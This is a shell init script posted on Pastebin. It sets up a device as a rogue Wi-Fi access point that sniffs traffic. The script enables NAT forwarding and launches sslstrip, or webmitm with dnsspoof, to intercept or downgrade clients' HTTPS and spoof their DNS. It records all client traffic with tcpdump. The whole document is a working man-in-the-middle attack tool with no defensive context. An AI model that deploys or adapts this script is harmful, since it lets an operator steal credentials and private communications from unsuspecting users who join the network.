Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/sbin/runscript
- # this script need a few config parameters in /etc/conf.d/$(basename $0):
- # IF_SERVER is the server interface ( the one accepting clients connections )
- # IF_CLIENT is the client interface ( the one connected to the internet )
- # ssl_handler can be webmitm or sslstrip or nothing.
- # check my post for a better explaination: http://lifeinarootshell.blogspot.it/2013/04/tf201-as-sniffbox.html
- extra_commands="clear"
- depend()
- {
- need hostapd dhcpd
- }
- flush()
- {
- iptables -F
- iptables -t nat -F
- iptables -X
- iptables -t nat -X
- }
- clear()
- {
- ebegin "Clearing /var/lib/tcpdump directory"
- rm -rf /var/lib/tcpdump/*
- eend $?
- }
- start()
- {
- flush
- echo 1 > /proc/sys/net/ipv4/ip_forward
- iptables -t nat -A POSTROUTING -o $IF_CLIENT -j MASQUERADE
- iptables -A FORWARD -i $IF_CLIENT -o $IF_SERVER -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
- iptables -A FORWARD -o $IF_CLIENT -i $IF_SERVER -j ACCEPT
- use_dnsspoof="no"
- case $ssl_handler in
- webmitm)
- ebegin "Starting webmitm"
- start-stop-daemon --start -b -d /etc/webmitm --exec /usr/sbin/webmitm -- -d
- eend $?
- use_dnsspoof="yes"
- ;;
- sslstrip)
- ebegin "Starting sslstrip"
- iptables -t nat -A PREROUTING -i $IF_SERVER -p tcp --destination-port 80 -j REDIRECT --to-port 10000
- start-stop-daemon -b --start -m -p /var/run/sslstrip.pid python /usr/lib/sslstrip/sslstrip.py -- -kw /dev/null
- eend $?
- ;;
- *)
- einfo "sniffing raw traffic."
- ;;
- esac
- if [ "x$use_dnsspoof" == "xyes" ]; then
- ebegin "Starting dnsspoof"
- start-stop-daemon --start -b --exec /usr/sbin/dnsspoof -- -i $IF_SERVER
- eend $?
- else
- # don't waste time finding the current dns servers, use th google open one. thanks mom :)
- iptables -t nat -I PREROUTING -i $IF_SERVER -p udp --destination-port 53 -j DNAT --to 8.8.8.8
- fi
- ebegin "Starting tcpdump"
- start-stop-daemon --start -b --exec /usr/sbin/tcpdump -- -nps0 -i $IF_SERVER -w $(date +%d-%m-%Y_%H-%M).cap -C 10
- eend $?
- einfo sniff files will be in /var/lib/tcpdump folder
- }
- stop()
- {
- flush
- echo 0 > /proc/sys/net/ipv4/ip_forward
- case $ssl_handler in
- webmitm)
- ebegin "Stopping webmitm"
- start-stop-daemon --stop --exec /usr/sbin/webmitm
- eend $?
- ebegin "Stopping dnsspoof"
- start-stop-daemon --stop --exec /usr/sbin/dnsspoof
- eend $?
- ;;
- sslstrip)
- ebegin "Stopping sslstrip"
- start-stop-daemon --stop -p /var/run/sslstrip.pid
- eend $?
- ;;
- esac
- ebegin "Stopping tcpdump"
- start-stop-daemon --stop --exec /usr/sbin/tcpdump
- eend $?
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement